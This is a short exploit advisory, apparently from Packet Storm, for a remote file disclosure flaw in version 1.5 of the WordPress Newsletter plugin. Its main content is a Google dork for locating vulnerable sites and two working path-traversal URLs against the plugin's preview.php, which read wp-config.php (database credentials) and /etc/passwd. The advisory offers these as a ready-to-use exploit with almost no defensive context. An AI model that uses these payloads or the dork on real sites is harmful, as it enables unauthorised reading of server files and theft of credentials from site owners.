WordPress Newsletter plugin version 1.5 suffers from a remote file disclosure vulnerability.
09d7fab221f00944084c7fb1e89aef576fcffdfc40e8d842eea78f20e97f72cd##################################################
# Description : Wordpress Plugins - Plugin: Newsletter Remote File
Disclosure Vulnerability
# Version : 1.5
# Link : http://wordpress.org/extend/plugins/plugin-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
# Date : 31-05-2012
# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit :
http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
Read source [CTRL-u]
http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd
Read source [CTRL-u]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed